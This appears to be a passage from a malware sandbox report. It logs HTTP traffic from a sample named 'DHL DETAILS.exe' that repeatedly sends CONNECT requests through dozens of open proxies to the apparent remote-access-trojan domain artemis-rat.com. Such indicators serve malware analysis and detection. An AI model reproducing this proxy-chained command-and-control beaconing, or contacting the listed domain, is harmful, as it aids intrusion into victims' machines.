Mar 9, 2024 13:14:13.707694054 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
385	192.168.2.5	51232	72.195.34.58	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.555443048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
386	192.168.2.5	50784	117.160.250.131	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.564163923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.134532928 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
387	192.168.2.5	51317	166.62.38.100	2453	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.565186024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.004935980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.489372015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.473721981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.536700964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
388	192.168.2.5	50698	117.160.250.138	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.572153091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.245683908 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
389	192.168.2.5	51280	174.77.111.198	49547	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.574891090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
390	192.168.2.5	51191	120.76.42.209	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.574923992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
391	192.168.2.5	51194	150.109.243.156	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.575119019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
392	192.168.2.5	51079	115.74.157.191	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.575970888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
393	192.168.2.5	50014	176.99.2.43	1081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.577617884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.567687035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.568126917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.567619085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677536011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
394	192.168.2.5	51245	147.75.92.251	9401	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.578269958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.853466988 CET	356	IN	HTTP/1.0 502 Bad Gateway Server: Zscaler/6.3 Content-Type: text/html Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
395	192.168.2.5	51331	104.16.105.146	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.587443113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.741734982 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
396	192.168.2.5	51029	124.160.118.183	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.588237047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.017083883 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx/1.8.1 Date: Sun, 10 Mar 2024 00:35:19 GMT Content-Type: text/html Content-Length: 172 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
397	192.168.2.5	51195	185.158.114.14	25697	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.592116117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
398	192.168.2.5	50028	43.255.113.232	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.593029976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.945935011 CET	208	IN	HTTP/1.0 404 Not Found Server: HCS Date: Sat, 09 Mar 2024 15:01:39 GMT Content-Type: text/html Content-Length: 432 HCS-Error: ERR_FTP_NOT_FOUND 0 X-NGAA: MISS from CH-XW-NO1-315.1 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
399	192.168.2.5	50985	104.248.151.220	63997	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.593638897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
400	192.168.2.5	51347	188.114.99.37	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.593688011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.747951984 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
401	192.168.2.5	50440	107.181.168.145	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.594309092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
402	192.168.2.5	51247	82.113.157.122	31280	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.599705935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
403	192.168.2.5	50185	12.186.205.121	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.602869034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.676913023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.677499056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.676976919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677736044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
404	192.168.2.5	51221	114.132.202.78	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.604103088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.138015032 CET	84	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Transfer-Encoding: chunked

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
405	192.168.2.5	51215	37.204.157.91	41890	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.607032061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.301852942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.182049990 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
406	192.168.2.5	51251	211.222.252.187	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.607867956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
407	192.168.2.5	50025	45.117.179.179	6522	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.620099068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.676911116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.677495956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.677092075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677737951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
408	192.168.2.5	51296	174.77.111.197	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.620407104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
409	192.168.2.5	51283	121.159.146.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.626656055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.925744057 CET	310	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
410	192.168.2.5	51235	221.151.181.101	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.627460957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
